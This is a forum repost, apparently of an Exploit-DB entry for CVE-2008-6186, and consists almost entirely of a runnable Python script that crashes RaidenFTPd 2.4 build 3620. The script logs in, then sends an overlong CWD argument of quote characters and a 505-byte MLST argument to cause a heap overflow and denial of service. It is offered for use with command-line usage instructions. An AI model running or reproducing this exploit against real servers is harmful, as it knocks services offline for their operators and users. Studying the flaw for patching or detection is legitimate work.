Exploit RaidenFTPd 2.4 build 3620 - Remote Denial of Service

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
6742
Проверка EDB
  1. Пройдено
Автор
DMNT
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
cve-2008-6186
Дата публикации
2008-10-13
Код:
# RaidenFTPD V2.4 build 3620 exploit
# probaly heap overflow
#
# (x)dmnt 2008
# -*- coding: windows-1252 -*-

import socket
import sys, time

evil_cwd = "/"+"\x22"*255
evil_dir = "X"*505

def help_info():
    print ("Usage: ShaoKahn <host> <login> <password>\n")
    print ("Note: anonymous is enought")

def dos_it(hostname, username, passwd):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((hostname, 21))
    except:
        print ("[-] Connection error!")
        sys.exit(1)
    r=sock.recv(2048)
    print "[+] Connected"
    sock.send("user %s\r\n" %username)
    r=sock.recv(1024)
    time.sleep(3)
    sock.send("pass %s\r\n" %passwd)
    r=sock.recv(1024)
    print "[+] Send evil string"
    time.sleep(3)
    sock.send("cwd %s\r\n" %evil_cwd)
    r=sock.recv(1024)
    time.sleep(3)
    sock.send("mlst %s\r\n" %evil_dir)
    r=sock.recv(1024)
    time.sleep(3)
    sock.close()
    print "[:)] Now server d0s'ed/heap corrupted"

print ("\n]RaidenFTPD V2.4 build 3620 remote DoS exploit")
print ("](x)dmnt 2008\n\n")

if len(sys.argv) <> 4:
    help_info()
    sys.exit(1)

else:
    hostname=sys.argv[1]
    username=sys.argv[2]
    passwd=sys.argv[3]
    dos_it(hostname,username,passwd)
    sys.exit(0)

# milw0rm.com [2008-10-13]
 
Источник
www.exploit-db.com

Похожие темы